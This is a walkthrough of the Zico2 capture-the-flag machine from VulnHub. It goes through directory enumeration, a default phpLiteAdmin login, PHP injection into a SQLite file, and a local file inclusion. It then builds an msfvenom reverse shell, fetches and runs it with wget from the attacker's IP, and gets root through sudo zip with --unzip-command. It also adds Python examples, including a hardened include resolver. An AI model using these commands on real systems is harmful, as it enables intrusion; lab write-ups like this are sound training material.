Zico2 is a machine from VulnHub. Created by Rafael, it was published on June 19th, 2017, and can be downloaded from https://www.vulnhub.com/entry/zico2-1,210/

The objective is to get root privileges and get the flag.

For a change, I would be using https://root-me.org to run the target machine. I tried to run the machine locally using VMware and VirtualBox; however, due to some networking issues, Zico was not being assigned an IP address. I contacted Rafael on Twitter, and he was more than happy and willing to solve my problem. In the end, he suggested I give https://root-me.org a try, as they already have a working copy of Zico in their CTF-all-day.

Once signed up, starting Zico is simple: go to CTF-all-day, select the vulnerable machine you want to use, in this case Zico2 (last in the list, as it is alphabetized), and start the game.

My machine was reachable at http://ctf03.root-me.org/, and this is what it showed:

Let the attacking begin. As my attacking machine, I will be using Kali 2017.1 running on VMware Fusion.

Running a simple Zenmap scan showed the following ports open:

Since we know Zico's Shop is running on port 80, let's focus on that for now. I ran dirb to see what more I could gather from it:

$ dirb http://ctf03.root-me.org/

This turned up a directory called dbadmin containing a PHP file called test_db.php:

This opened phpLiteAdmin. Trying the first default password, admin, got me in:

I looked around and found that two users had been created. I tried to crack the hash and log in over SSH, but it did not work:

After looking around for a while, I realized that this might be vulnerable to Remote PHP Code Injection (https://www.exploit-db.com/exploits/24044/), so I gave that a try:

  • So, I created a database called hack.php
  • I created a table with the name test with 1 column
  • Under test, I created a field test as TEXT with the default value: <?php phpinfo(); ?>
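Why those three steps produce an executable file: SQLite stores the CREATE TABLE statement verbatim in the database file, so the PHP tag in the DEFAULT value ends up on disk byte for byte, and PHP's include() executes any <?php ... ?> segment it finds no matter what surrounds it. The following added example (my own code, not from the original write-up or from phpLiteAdmin) recreates the three steps with Python's sqlite3 module in a temporary directory and shows the tag surviving in the raw file; the file name hack.php and the payloads are taken from the steps above.

```python
import os
import re
import sqlite3
import tempfile
from typing import List, Optional

# Payload from the write-up: phpLiteAdmin's DEFAULT value becomes this text.
PAYLOAD = "<?php phpinfo(); ?>"

# Matches every PHP open/close tag pair; this is what the interpreter executes
# when the file is include()d. Bytes outside the tags are emitted verbatim.
PHP_TAG_RE = re.compile(rb"<\?php\b.*?\?>", re.S)


def build_poisoned_db(payload: str = PAYLOAD,
                      directory: Optional[str] = None) -> bytes:
    """Recreate the three phpLiteAdmin steps directly with sqlite3:
    a database file named hack.php, one table called test, one TEXT column
    called test whose DEFAULT value is the PHP payload.
    Returns the raw bytes of the resulting file."""
    if "'" in payload:
        # SQLite keeps the DDL text exactly as written, so a quote doubled
        # for SQL ('') would also be doubled in the PHP that gets executed.
        # Use double quotes inside the PHP instead, as the wget payload
        # later in the write-up does.
        raise ValueError("use double quotes inside the PHP payload")
    directory = directory or tempfile.mkdtemp()  # assumption: a scratch dir
    path = os.path.join(directory, "hack.php")
    conn = sqlite3.connect(path)
    conn.execute(f"CREATE TABLE test (test TEXT DEFAULT '{payload}')")
    conn.commit()
    conn.close()
    with open(path, "rb") as fh:
        return fh.read()


def php_segments(blob: bytes) -> List[str]:
    """Return every <?php ... ?> segment in the file, in order."""
    return [m.decode("ascii") for m in PHP_TAG_RE.findall(blob)]


if __name__ == "__main__":
    blob = build_poisoned_db()
    print("SQLite header intact:", blob.startswith(b"SQLite format 3\x00"))
    print("PHP segments PHP would execute:", php_segments(blob))
```

The binary SQLite header and page data are printed straight to the HTTP response when the file is included, which is why the phpinfo() output on the page is preceded by garbage; the payload still runs.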

Now, to get that PHP executed, I need to find an LFI vulnerability in the web application so that the database file gets included as PHP.

To do that, I went back to the web application and started going through the source code. Within minutes the following code block caught my eye:


This looked like something I could work with:

http://ctf03.root-me.org/view.php?page=../../usr/databases/hack.php
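Why that exact path reaches the database, and what view.php should have done instead, as an added example of my own (not code from the original write-up, and not the real view.php, whose source is only shown as a screenshot above). It assumes the web root is /var/www, so that two ../ steps land on the filesystem root; the pages directory and the allowlist are constructed for the example. The naive resolver models include($_GET['page']) with no validation; the hardened one applies an allowlist and a containment check.

```python
import posixpath
from typing import Optional

# Assumptions (not stated on the page): web root /var/www, so "../../" from
# it reaches "/", and legitimate pages live in /var/www/pages/<name>.php.
WEBROOT = "/var/www"
PAGES_DIR = posixpath.join(WEBROOT, "pages")
ALLOWED_PAGES = frozenset({"index", "tools", "shop"})  # constructed allowlist


def vulnerable_resolve(page: str) -> str:
    """Model of include($_GET['page']) with no validation: the user-supplied
    value is joined to the web root and normalised, so '..' walks out of it
    and an absolute path replaces the web root entirely."""
    return posixpath.normpath(posixpath.join(WEBROOT, page))


def escapes_webroot(page: str) -> bool:
    """True when the naive include would read a file outside the web root."""
    return not vulnerable_resolve(page).startswith(WEBROOT + "/")


def hardened_resolve(page: str) -> Optional[str]:
    """Allowlist first, then containment as defence in depth.
    Returns the file to include, or None to refuse the request."""
    if page not in ALLOWED_PAGES:
        return None
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    # Even if the allowlist were loosened later, never include outside
    # PAGES_DIR. Compare against the normalised path, never the raw input.
    if not candidate.startswith(PAGES_DIR + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ("tools", "../../usr/databases/hack.php", "/etc/passwd"):
        print(f"{p!r:36} naive -> {vulnerable_resolve(p):28} "
              f"escapes={escapes_webroot(p)!s:5} hardened -> {hardened_resolve(p)}")
```

With the web root at /var/www, ../../usr/databases/hack.php normalises to /usr/databases/hack.php, which is where phpLiteAdmin wrote the database; the hardened resolver refuses it because the value is not on the allowlist, and would refuse it anyway because the normalised path leaves the pages directory.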

The include worked! Now it is time to make a shell and get connected. To make the shell, I used MSFvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.92.141 lport=4444 -f elf > /root/Desktop/shell

Time to upload it to the target machine:

I updated the entry in the table to the following:

<?php system("cd /tmp; wget http://172.16.92.141/shell; chmod +x shell; ./shell"); ?>

and started a multi/handler in Metasploit:

and we got a session!

Looking through the folders, a file called wp-config.php in /home/zico/wordpress/ seemed to contain some useful information:

Using these credentials, I tried to log in over SSH, and they worked!

Now time to get root privileges:

On trying the command:

$ sudo -l

This is what it showed us:

After running the following two commands (zip's -T option tests the archive, and --unzip-command lets us choose the program used for that test, so under sudo that program runs as root):

$ touch /tmp/exploit

$ sudo -u root zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/sh"

We are root!
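Reading sudo -l output by eye is how this escalation was found; the following added example (my own code, not from the original write-up) does the same triage programmatically: it parses the "User ... may run the following commands" section into (runas, NOPASSWD, command) rules and flags commands whose legitimate options can run an arbitrary program, zip's -T --unzip-command being the one used here. The sample sudo -l output is constructed for the example and is not the exact text from the box, which the page shows only as a screenshot.

```python
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample modelled on the sudoers output format; the real entries
# on the box are not reproduced on the page in text form.
SAMPLE_SUDO_L = """\
Matching Defaults entries for zico on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
"""

# Binaries whose documented options run a user-supplied command. The zip
# entry is the trick used above; the others are well-known equivalents.
SHELL_ESCAPES: Dict[str, str] = {
    "zip": "-T --unzip-command='sh -c /bin/sh' runs the command as the archive test",
    "tar": "--checkpoint=1 --checkpoint-action=exec=/bin/sh runs a command at a checkpoint",
    "find": "-exec /bin/sh \\; runs a command for each matched file",
    "vim": "-c ':!sh' spawns a shell from the editor",
    "less": "!sh spawns a shell from the pager",
}


class SudoRule(NamedTuple):
    runas: str
    nopasswd: bool
    command: str


# "(runas) TAG: TAG: command, command" -- tags are optional upper-case words
# ending in a colon; continuation lines without parentheses are not handled.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract one SudoRule per command from `sudo -l` output."""
    rules: List[SudoRule] = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append(SudoRule(m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(rules: List[SudoRule]) -> List[Tuple[SudoRule, str]]:
    """Pair each rule that gives a shell with the reason it does."""
    findings = []
    for rule in rules:
        name = rule.command.split()[0].rsplit("/", 1)[-1] if rule.command != "ALL" else "ALL"
        if name == "ALL":
            findings.append((rule, "unrestricted: any command as " + rule.runas))
        elif name in SHELL_ESCAPES:
            findings.append((rule, SHELL_ESCAPES[name]))
    return findings


if __name__ == "__main__":
    for rule, why in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        pw = "NOPASSWD" if rule.nopasswd else "password"
        print(f"{rule.command} as {rule.runas} ({pw}): {why}")
```

The table of escapes is deliberately short; the point of the parser is that the sudoers format (runas in parentheses, optional tags, comma-separated commands) is regular enough to check mechanically on every box rather than by eye.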

Here’s the flag: